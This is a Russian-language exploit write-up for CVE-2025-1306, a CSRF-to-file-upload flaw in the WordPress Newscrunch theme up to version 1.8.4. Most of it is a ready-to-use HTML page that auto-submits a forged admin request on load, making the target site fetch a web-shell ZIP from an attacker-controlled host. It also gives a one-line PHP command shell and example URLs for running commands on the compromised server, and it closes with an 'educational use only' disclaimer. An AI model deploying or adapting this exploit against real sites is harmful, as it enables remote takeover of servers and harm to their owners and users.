
Newscrunch <= 1.8.4 - Межсайтовая подделка запроса (CSRF), приводящая к произвольной загрузке файлов
Этот эксплойт нацелен на уязвимость межсайтовой подделки запроса (CSRF), приводящей к произвольной загрузке файлов (CVE-2025-1306) в теме WordPress Newscrunch. Из-за отсутствия проверки nonce в функции newscrunch_install_and_activate_plugin() неаутентифицированный злоумышленник может обманом заставить вошедшего в систему администратора загрузить произвольные файлы на сервер, что приводит к удалённому выполнению кода (RCE).
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:HЭксплуатируемость: Требуется, чтобы администратор перешёл по специально созданной вредоносной ссылке.
Этот эксплойт заставляет аутентифицированного администратора выполнить CSRF-атаку, которая загружает вредоносный ZIP-файл, содержащий веб-шелл.
<!DOCTYPE html>
<html>
<head>
<title>CSRF Exploit CVE-2025-1306 By Nxploit ,Khaled AlEnazi</title>
</head>
<body>
<h2>Click anywhere to load content...</h2>
<script>
function sendExploit() {
var form = document.createElement("form");
form.method = "POST";
form.action = "http://target.com/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin";
var input = document.createElement("input");
input.type = "hidden";
input.name = "plugin_url";
input.value = "http://attacker.com/shell.zip";
form.appendChild(input);
document.body.appendChild(form);
form.submit();
}
window.onload = function() {
sendExploit();
};
</script>
</body>
</html>
📌 Замените:
http://target.com/ на уязвимый сайт WordPresshttp://attacker.com/shell.zip на вредоносную ZIP-нагрузку, содержащую веб-шелл.<?php system($_GET['cmd']); ?>
📌 После успешной эксплуатации получите доступ к шеллу:
http://target.com/wp-content/plugins/shell.php?cmd=whoami
http://target.com/wp-content/plugins/shell.php?cmd=ls
Этот инструмент предназначен только для образовательных целей и исследований в области безопасности. Несанкционированная эксплуатация уязвимостей незаконна и наказуема по закону. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Используйте ответственно.